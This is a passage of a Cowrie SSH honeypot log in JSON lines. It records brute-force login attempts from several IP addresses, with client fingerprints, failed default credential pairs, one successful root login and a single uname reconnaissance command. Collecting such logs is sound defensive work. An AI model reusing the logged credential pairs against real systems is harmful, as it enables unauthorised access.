SH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:07:52.848837Z","src_ip":"83.168.105.65","session":"be055d02ff9b"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant","message":"login attempt [vagrant/vagrant] failed","sensor":"my-vps","timestamp":"2025-08-26T12:07:52.957788Z","src_ip":"83.168.105.65","session":"be055d02ff9b"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:07:53.441732Z","src_ip":"212.227.235.229","session":"157234dab1b9"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:07:53.995210Z","src_ip":"83.168.105.65","session":"be055d02ff9b"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38524,"dst_ip":"1.2.3.4","dst_port":22,"session":"d59c614a5c4c","protocol":"ssh","message":"New connection: 196.251.86.249:38524 (1.2.3.4:22) [session: d59c614a5c4c]","sensor":"my-vps","timestamp":"2025-08-26T12:08:03.780633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:08:04.248786Z","src_ip":"196.251.86.249","session":"d59c614a5c4c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:08:04.249543Z","src_ip":"196.251.86.249","session":"d59c614a5c4c"}
{"eventid":"cowrie.login.failed","username":"git","password":"qwerty123","message":"login attempt [git/qwerty123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:08:06.738316Z","src_ip":"196.251.86.249","session":"d59c614a5c4c"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":53662,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f7dbfc2ac72","protocol":"ssh","message":"New connection: 83.168.105.65:53662 (1.2.3.4:22) [session: 8f7dbfc2ac72]","sensor":"my-vps","timestamp":"2025-08-26T12:08:08.257250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:08:08.258178Z","src_ip":"83.168.105.65","session":"8f7dbfc2ac72"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:08:08.297832Z","src_ip":"83.168.105.65","session":"8f7dbfc2ac72"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:08:08.346341Z","src_ip":"196.251.86.249","session":"d59c614a5c4c"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123","message":"login attempt [esuser/123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:08:08.418029Z","src_ip":"83.168.105.65","session":"8f7dbfc2ac72"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:08:09.460021Z","src_ip":"83.168.105.65","session":"8f7dbfc2ac72"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":54578,"dst_ip":"1.2.3.4","dst_port":22,"session":"194f30e9d3b7","protocol":"ssh","message":"New connection: 83.168.105.65:54578 (1.2.3.4:22) [session: 194f30e9d3b7]","sensor":"my-vps","timestamp":"2025-08-26T12:08:23.676181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:08:23.677122Z","src_ip":"83.168.105.65","session":"194f30e9d3b7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:08:23.716367Z","src_ip":"83.168.105.65","session":"194f30e9d3b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58890,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c6b96544859","protocol":"ssh","message":"New connection: 212.227.235.229:58890 (1.2.3.4:22) [session: 3c6b96544859]","sensor":"my-vps","timestamp":"2025-08-26T12:08:23.814250Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T12:08:23.836472Z","src_ip":"83.168.105.65","session":"194f30e9d3b7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:08:24.062884Z","src_ip":"212.227.235.229","session":"3c6b96544859"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:08:24.063890Z","src_ip":"212.227.235.229","session":"3c6b96544859"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:08:24.878093Z","src_ip":"83.168.105.65","session":"194f30e9d3b7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123123","message":"login attempt [admin/123123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:08:25.964930Z","src_ip":"212.227.235.229","session":"3c6b96544859"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:08:27.171367Z","src_ip":"212.227.235.229","session":"3c6b96544859"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":39382,"dst_ip":"1.2.3.4","dst_port":22,"session":"0870618fb6e5","protocol":"ssh","message":"New connection: 83.168.105.65:39382 (1.2.3.4:22) [session: 0870618fb6e5]","sensor":"my-vps","timestamp":"2025-08-26T12:08:39.331040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:08:39.334532Z","src_ip":"83.168.105.65","session":"0870618fb6e5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:08:39.375798Z","src_ip":"83.168.105.65","session":"0870618fb6e5"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser123","message":"login attempt [esuser/esuser123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:08:39.499146Z","src_ip":"83.168.105.65","session":"0870618fb6e5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:08:40.541569Z","src_ip":"83.168.105.65","session":"0870618fb6e5"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55670,"dst_ip":"1.2.3.4","dst_port":22,"session":"4579b6205ac8","protocol":"ssh","message":"New connection: 217.72.205.35:55670 (1.2.3.4:22) [session: 4579b6205ac8]","sensor":"my-vps","timestamp":"2025-08-26T12:08:54.862422Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:08:54.863634Z","src_ip":"217.72.205.35","session":"4579b6205ac8"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":60394,"dst_ip":"1.2.3.4","dst_port":22,"session":"62a9a6008f0a","protocol":"ssh","message":"New connection: 83.168.105.65:60394 (1.2.3.4:22) [session: 62a9a6008f0a]","sensor":"my-vps","timestamp":"2025-08-26T12:08:54.978949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:08:54.979766Z","src_ip":"83.168.105.65","session":"62a9a6008f0a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:08:55.016077Z","src_ip":"83.168.105.65","session":"62a9a6008f0a"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:08:55.126294Z","src_ip":"83.168.105.65","session":"62a9a6008f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:08:55.213762Z","src_ip":"83.168.105.65","session":"62a9a6008f0a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:08:55.214519Z","src_ip":"83.168.105.65","session":"62a9a6008f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:08:55.251832Z","src_ip":"83.168.105.65","session":"62a9a6008f0a"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:08:55.253003Z","src_ip":"83.168.105.65","session":"62a9a6008f0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48896,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9f604735c95","protocol":"ssh","message":"New connection: 212.227.235.229:48896 (1.2.3.4:22) [session: a9f604735c95]","sensor":"my-vps","timestamp":"2025-08-26T12:08:57.850840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:08:58.112352Z","src_ip":"212.227.235.229","session":"a9f604735c95"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:08:58.113032Z","src_ip":"212.227.235.229","session":"a9f604735c95"}
{"eventid":"cowrie.login.failed","username":"admin","password":"111111","message":"login attempt [admin/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T12:09:00.011269Z","src_ip":"212.227.235.229","session":"a9f604735c95"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:09:01.337006Z","src_ip":"212.227.235.229","session":"a9f604735c95"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38012,"dst_ip":"1.2.3.4","dst_port":22,"session":"7875b31ea253","protocol":"ssh","message":"New connection: 196.251.86.249:38012 (1.2.3.4:22) [session: 7875b31ea253]","sensor":"my-vps","timestamp":"2025-08-26T12:09:04.211843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:09:04.799277Z","src_ip":"196.251.86.249","session":"7875b31ea253"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:09:04.800156Z","src_ip":"196.251.86.249","session":"7875b31ea253"}
{"eventid":"cowrie.login.failed","username":"git","password":"123321","message":"login attempt [git/123321] failed","sensor":"my-vps","timestamp":"2025-08-26T12:09:06.668725Z","src_ip":"196.251.86.249","session":"7875b31ea253"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.245","src_port":8630,"dst_ip":"1.2.3.4","dst_port":22,"session":"70e4ec8b3b95","protocol":"ssh","message":"New connection: 172.236.228.245:8630 (1.2.3.4:22) [session: 70e4ec8b3b95]","sensor":"my-vps","timestamp":"2025-08-26T12:09:07.195468Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:09:07.450074Z","src_ip":"172.236.228.245","session":"70e4ec8b3b95"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T12:09:07.452224Z","src_ip":"172.236.228.245","session":"70e4ec8b3b95"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:09:08.215683Z","src_ip":"196.251.86.249","session":"7875b31ea253"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:09:08.330163Z","src_ip":"172.236.228.245","session":"70e4ec8b3b95"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.245","src_port":8636,"dst_ip":"1.2.3.4","dst_port":22,"session":"52f76f8de5e2","protocol":"ssh","message":"New connection: 172.236.228.245:8636 (1.2.3.4:22) [session: 52f76f8de5e2]","sensor":"my-vps","timestamp":"2025-08-26T12:09:08.498302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:09:08.799821Z","src_ip":"172.236.228.245","session":"52f76f8de5e2"}
